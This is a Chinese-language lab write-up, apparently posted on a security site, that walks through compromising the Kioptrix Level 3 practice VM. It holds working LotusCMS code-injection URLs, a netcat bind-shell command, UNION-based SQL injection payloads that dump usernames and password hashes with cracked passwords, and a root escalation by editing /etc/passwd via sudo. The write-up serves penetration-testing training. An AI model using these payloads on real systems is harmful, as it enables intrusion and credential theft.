Kioptrix_Level_3 渗透解决方案

目标:

192.168.1.13

首先nmap扫描目标:nmap -sT -A -P0 192.168.1.13

PORT   STATE SERVICE VERSION

22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)

80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)

….

Running: Linux 2.6.X

OS CPE: cpe:/o:linux:linux_kernel:2.6

OS details: Linux 2.6.9 – 2.6.33

只开放了22和80端口。

再用Nessus扫描,没有可以利用的系统漏洞。由于开放了80端口,可以尝试对web进行渗透,在浏览器中打开,如图所示:

image002

查看源代码:

image004

可以猜测该网站系统为:LotusCMS,在网上搜索该CMS的漏洞,如图:

image006

于是有了思路一:利用Lotus CMS以前爆出的漏洞渗透。继续查看网站,点击Login选项,如图:

image008

尝试是否存在登陆绕过,弱口令等。失败。。。

继续查看并分析网站,进入了此目录:http://192.168.1.13/gallery/,如图:

image010

查看该页的源代码,有几个收获:

(1)如图:

image012

注意到第二行:<meta http-equiv=”Generator” content=”Gallarific” /> Gallarific是什么东东? 91ri.org 网上搜索看,如图:

image014

发现没有,有可以利用的漏洞,于是又有了第二个思路:利用Gallarific的漏洞进行渗透。

(2) 如图:

image016

看见没有?注释掉的那一行,<!– <a href=”gadmin”>Admin</a>&nbsp;&nbsp; –> gadmin 有点像链接到后台的地址,试试? http://192.168.1.13/gallery/gadmin/,果然,如图:

image018

同样尝试是否存在登陆绕过,弱口令等。失败。。。

之后,对网站进行查看分析没有发现更多有用的信息,最后将网站丢到WVS去扫,没有让人失望,发现几个地方的存在代码注入漏洞,于是又有了第三个思路:利用代码注入漏洞进行渗透。

综合以上的分析,将渗透的思路归纳如下:

思路一、利用Lotus CMS以前爆出的漏洞渗透。

思路二、利用代码注入漏洞进行渗透。

思路三、利用Gallarific的漏洞进行渗透。

 

下面对三个思路逐一尝试:

思路一:网上的信息很少,暂且放弃之。。。

思路二:利用代码注入漏洞进行渗透。

http://192.168.1.13/index.php?page=${@print(system(%22ls%22))}\,返回如图:

image020

由于可以执行任意代码,在远程监听一个端口,本地去连接它,执行:

http://192.168.1.13/index.php?page=${@print(system(“/bin/nc+-l+-p+5555+-e+/bin/bash”))}\,本地监听,如图:(nc的路径可以通过执行find / -name nc 找到)

image022

可以看出 ,不是root权限,后来尝试了N个本地提权的代码(如果谁有可以本地提权的代码,还望能够分享,谢谢),都不能成功,暂时放下此种思路,尝试思路三。

思路三、利用Gallarific的漏洞进行渗透。

在exploit-db上搜索Gallarific的漏洞,如图:

image024

可知有一个SQL Injection 漏洞,打开 如下所示:

image026

注入点:www.site.com/gallery.php?id=null

于是尝试如下链接: http://192.168.1.13/gallery/gallery.php?id=1 存在注入,为了方便可以直接丢进sqlmap跑。但为了更加深入的了解SQL注入,这里不用工具,于是。。。。

猜字段数:

http://192.168.1.13/gallery/gallery.php?id=1 order by 6—正常

http://192.168.1.13/gallery/gallery.php?id=1 order by 7—报错 字段数为6

爆出可利用的字段:

http://192.168.1.13/gallery/gallery.php?id=1 and 1=2 union select 1,2,3,4,5,6 返回如图:

image028

可以看出 3 可以利用。。。。

爆出所有的表名:

http://youip/gallery/gallery.php?id=1 and 1=2 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()),4,5,6

返回如下:

image030

dev_accounts,gallarific_comments,gallarific_galleries,gallarific_photos,gallarific_settings,gallarific_stats,gallarific_users

注意到dev_accounts和gallarific_users两个表,可以猜测是账号和用户信息表。此时联想到开放了SSH,首先爆出dev_accounts中的信息,尝试SSH登陆.

爆出dev_accounts所有的列名:

http://youip/gallery/gallery.php?id=1 and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name=’dev_accounts’),4,5,6

返回如下:

image032

爆出username和password的具体内容:

http://youip/gallery/gallery.php?id=1 and 1=2 union select 1,2,(select group_concat(username, 0x3A, password) from dev_accounts),4,5,6

返回如下:

image034

一共两个用户:

dreg     0d3eccfb887aabd50f243b3f155c0f85

loneferret 5badcaf789d3d1d09794d8f021f40f0e

丢到网上破解,运气还不错 两个都成功破解:

dreg     0d3eccfb887aabd50f243b3f155c0f85—-Mast3r

loneferret 5badcaf789d3d1d09794d8f021f40f0e—–starwars

下面尝试SSH登陆,成功 如图:

image036

ls 一下,如图:

image038

注意到CompanyPolicy.READEME这个文件,cat 一下

image040

由此可见ht 可能是一个编辑器,尝试 sudo ht ,如图:

image042

按F3 打开一个文件 /etc/passwd(或者/etc/sudoers) 编辑loneferrt那一行把1000和100 分别改为0,CTRL+W 保存,如图:

image044

重新SSH登陆,执行id && whoami ,嘿嘿。已经是root权限了,如图:

image046

附:如果是打开/etc/sudoers这个文件,则把下面这一行:

loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht

改为:loneferret ALL=(ALL) ALL #NOPASSWD: !/usr/bin/su, /usr/local/bin/ht 即可。

到此,Kioptrix Level 3 渗透结束,学到了很多。O(∩_∩)O~

注:第一次写这个,如果有错误,还望各位大牛能够纠正并给予指导,谢谢。

E-Mail: felixk3y#qq.com  微博:http://t.qq.com/root-security

本文由felixk3y投稿给网络安全攻防研究室(www.91ri.org) 版权归本站所有,转载请注明本文链接与作者名字!